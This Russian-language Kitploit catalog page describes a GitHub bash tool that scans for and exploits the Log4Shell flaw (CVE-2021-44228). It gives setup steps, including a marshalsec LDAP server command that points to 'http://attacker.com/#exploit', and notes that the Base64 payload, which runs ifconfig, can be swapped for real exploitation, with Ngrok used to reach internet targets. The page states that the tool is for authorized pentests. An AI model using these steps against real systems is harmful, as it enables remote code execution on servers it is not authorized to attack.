Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4j-Scanner-Exploit — Bash-скрипт, который позволяет идентифицировать уязвимость Log4j CVE-2021-44228 удаленно. | Kitploit
Инструменты/GitHubGitHub/julian911015/log4j-scanner-exploit
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubjulian911015/log4j-scanner-exploit

Log4j-Scanner-Exploit

Bash-скрипт, который позволяет идентифицировать уязвимость Log4j CVE-2021-44228 удаленно.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
21 год назадЕщё не проверено

Log4Shell-Scanner-Exploit

Скрипт на bash, который позволяет удаленно выявлять и/или эксплуатировать уязвимость Log4shell. Этот инструмент выполняет различные тесты, используя LDAP-полезные нагрузки и заголовки X-Api-Version, User-Agent и X-Forwarded-For.

Всегда используйте этот скрипт только с предварительного разрешения владельца аудируемого сервиса/приложения.

Зависимости:

  1. Создадим предварительно настроенный LDAP-сервер из Github: https://github.com/mbechler/marshalsec

mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar

marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'

  1. Включим HTTP-сервер python3 -m http.server 8080

  2. Установить Java #sudo apt install default-jre

  3. Установить Curl #sudo apt-get install curl

Пример использования:

Введите следующие параметры:

  • Список URL для сканирования
  • IP-адрес LDAP-сервера
  • Порт LDAP-сервера
  • IP-адрес HTTP-сервера
  • Порт HTTP-сервера

#Пример сканирования приложения во внутренней сети:

  • ./Log4Shell_Scanner.sh <Словарь_URL> <IP_Сервера_LDAP> <Порт_Сервера_LDAP> <IP_Сервера_HTTP> <Порт_Сервера_HTTP>

image

#Пример сканирования приложения в интернете:

  • ./Log4Shell_Scanner.sh <Словарь_URL> <IP_Сервера_LDAP> <Порт_Сервера_LDAP> <IP_Сервера_HTTP> <Порт_Сервера_HTTP>

image

Разъяснения:

  • Используемый payload отправляет команду "ifconfig" на машины, идентифицированные как уязвимые; этот payload закодирован в Base64 и может быть изменён для выполнения фазы эксплуатации в ходе pentest-аудита.
  • Если требуется использовать инструмент в интернет-сервисах, можно запустить сервис Ngrok, который выполнит перенаправление портов на локальный порт LDAP-сервера.
  • Всегда используйте этот скрипт только с предварительного разрешения владельца аудируемого сервиса/приложения.
Скачать инструмент